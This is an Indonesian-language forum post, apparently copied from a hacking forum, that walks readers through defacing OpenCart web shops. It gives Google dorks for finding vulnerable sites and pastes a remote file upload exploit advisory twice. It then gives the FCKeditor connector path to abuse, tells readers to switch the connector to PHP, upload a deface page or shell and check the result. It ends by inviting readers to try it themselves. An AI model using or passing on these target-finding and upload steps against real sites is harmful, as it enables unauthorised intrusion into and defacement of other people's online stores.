Simple Deface OpenCart Website

Oke, langsung aja nih caranya
Seperti biasa nyarinya lewat paman google.
( Dorknya copy ke search engine google )
Dork nya :
SUPPORT BY OPENCART
atau
Powered By OpenCart site:com (site nya bisa kamu ganti,seperti my,il, dll yang penting suport opencart)
Klo pengen smuanya, site nya ilangin jadi gini aja Powered By OpenCart
Detail exploitnya adalah:



Shell
==========================================
Opencart remote file Upload Vulnerability
==========================================

#Exploit Title: Opencart remote file uploade
#Author: Net.Edit0r
#Email: [You must be registered and logged in to see this link.] ~ [You must be registered and logged in to see this link.]
#Google dork: d/download#Platform :linux/php ######################################Iranian HackerZ#################################### # [You must be registered and logged in to see this link.] Example site: [You must be registered and logged in to see this link.] Select the "File Upload" To use = php# [You must be registered and logged in to see this link.] Sh3ll : [You must be registered and logged in to see this link.] OR# [You must be registered and logged in to see this link.] ######################################Demo Example#################################### #Demo : [You must be registered and logged in to see this link.] : [You must be registered and logged in to see this link.] ######################################################################################### #Spical Thanks To >> Darkcoder ~ Classic ~ Jenne bamaram ~ S3Ri0uS ~_AriaNet_ And All B0x ((Web : ( [You must be registered and logged in to see this link.] ))) ########################################## End ##########################################[table class="crayon-table" cellpadding="0" cellspacing="0"]

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

========================================== Opencart remote file Upload Vulnerability ========================================== #Exploit Title: Opencart remote file uploade #Author: Net.Edit0r #Email: [You must be registered and logged in to see this link.] ~ [You must be registered and logged in to see this link.] #Google dork: [inurl:Powered By OpenCart #Software Link: [You must be registered and logged in to see this link.] #Platform :linux/php ######################################Iranian HackerZ#################################### # [You must be registered and logged in to see this link.] # Example site: [You must be registered and logged in to see this link.] # Select the "File Upload" To use = php # [You must be registered and logged in to see this link.] # Sh3ll : [You must be registered and logged in to see this link.] # OR # [You must be registered and logged in to see this link.] ######################################Demo Example#################################### #Demo : [You must be registered and logged in to see this link.] #Demo : [You must be registered and logged in to see this link.] ######################################################################################### #Spical Thanks To >> Darkcoder ~ Classic ~ Jenne bamaram ~ S3Ri0uS ~ _AriaNet_ And All B0x ((Web : ( [You must be registered and logged in to see this link.] ))) ########################################## End ##########################################

Langsung ke caranya,
Jika kamu sudah mendapatkan target nya
Contoh Target: [You must be registered and logged in to see this link.] bisa juga [You must be registered and logged in to see this link.],
[You must be registered and logged in to see this link.], dll.
Klo udah dapet targetnya tinggal kita inject exploitnya
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Jadinya kaya gini: [You must be registered and logged in to see this link.]
Klo ketemu yang kya gini [You must be registered and logged in to see this link.] kamu inject di belakang /shop/ nya..
Jangan lupa connector waktu uploadnya di ganti jadi PHP
Lalu kamu upload deh file defacenya, jika berhasil maka ada bacaan alert seperti ini “file uploaded with no errors”
Untuk melihat apakan berhasil di upload atau tidak kamu ke “Get Folders and Files” dan lihat hasilnya… [You must be registered and logged in to see this link.]
Jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
Contoh hasil deface ane nih [You must be registered and logged in to see this link.]


[You must be registered and logged in to see this image.]



Gampang kan ?
Selamat mencoba yaa… [You must be registered and logged in to see this link.]
*Budayakan Berbagi* & Jangan lupa gabung disini: [You must be registered and logged in to see this link.]